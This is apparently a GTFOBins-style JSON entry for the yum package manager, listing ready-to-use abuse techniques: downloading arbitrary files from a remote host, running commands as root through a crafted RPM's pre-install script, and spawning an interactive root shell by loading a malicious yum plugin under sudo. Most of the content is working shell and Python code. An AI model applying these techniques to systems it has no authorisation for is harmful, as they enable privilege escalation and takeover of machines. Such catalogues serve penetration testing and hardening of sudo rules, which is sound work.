You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
21 lines
1.3 KiB
JSON
21 lines
1.3 KiB
JSON
{
|
|
"functions": {
|
|
"file-download": [
|
|
{
|
|
"description": "Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of '.rpm', the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in '/var/tmp', for example '/var/tmp/yum-root-cR0O4h/'.",
|
|
"code": "yum install http://[host]/[file]\n"
|
|
}
|
|
],
|
|
"sudo": [
|
|
{
|
|
"description": "It runs commands using a specially crafted RPM package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF",
|
|
"code": "sudo yum localinstall -y x-1.0-1.noarch.rpm\n"
|
|
},
|
|
{
|
|
"description": "Spawn interactive root shell by loading a custom plugin.",
|
|
"code": "TF=$(mktemp -d)\ncat >$TF/x<<EOF\n[main]\nplugins=1\npluginpath=$TF\npluginconfpath=$TF\nEOF\n\ncat >$TF/y.conf<<EOF\n[main]\nenabled=1\nEOF\n\ncat >$TF/y.py<<EOF\nimport os\nimport yum\nfrom yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE\nrequires_api_version='2.1'\ndef init_hook(conduit):\n os.execl('/bin/sh','/bin/sh')\nEOF\n\nsudo yum -c $TF/x --enableplugin=y\n"
|
|
}
|
|
]
|
|
}
|
|
}
|